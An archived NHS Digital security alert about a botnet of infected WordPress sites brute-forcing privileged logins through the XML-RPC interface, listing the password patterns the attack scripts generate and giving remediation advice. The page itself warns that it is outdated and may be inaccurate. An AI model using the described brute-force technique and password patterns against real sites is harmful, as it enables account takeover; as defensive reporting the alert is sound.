WordPress Botnet Campaign
Security researchers have observed a botnet of over 20,000 infected WordPress websites being utilised to conduct cyber attacks against other WordPress websites.
This content has been archived
This article no longer conforms to NHS Digital's standards for cyber alerts, and may contain outdated or inaccurate information. Use of this information contained in this page is at your own risk
Summary
Security researchers have observed a botnet of over 20,000 infected WordPress websites being utilised to conduct cyber attacks against other WordPress websites.
Affected platforms
The following platforms are known to be affected:
Threat details
The infected websites are attempting to gain access to privileged accounts via brute-force authentication at /xmlrpc.php (the XML-RPC interface). Four command and control (C2) servers send requests to thousands of proxy servers, which forward them to the infected WordPress websites. The requests have user agent strings matching applications that commonly interact with the XML-RPC interface, like wp-iPhone and wp-android.
The attack scripts dynamically generate appropriate passwords based on common patterns such as %domainPattern%, %userName%, %userName%1, %userName%123, %userName%2018, %userName%2017, %userName%2016. The XML-RPC interface in WordPress version 4.3 and earlier allows the threat actors to test large numbers of username/password pairs in a single request. Since WordPress version 4.4, if one login attempt fails in an XML-RPC request then all subsequent attempts within the same request are also failed. The attackers can detect when this occurs and fall back to testing single user/password combinations.
Remediation
To help prevent and detect an attack, website administrators should consider the following actions:
- Keep WordPress installations up to date.
- Disable the XML-RPC interface if it is not required.
- Implement restrictions and lockouts for failed logins.
Remediation steps
Last edited: 7 September 2021 1:55 pm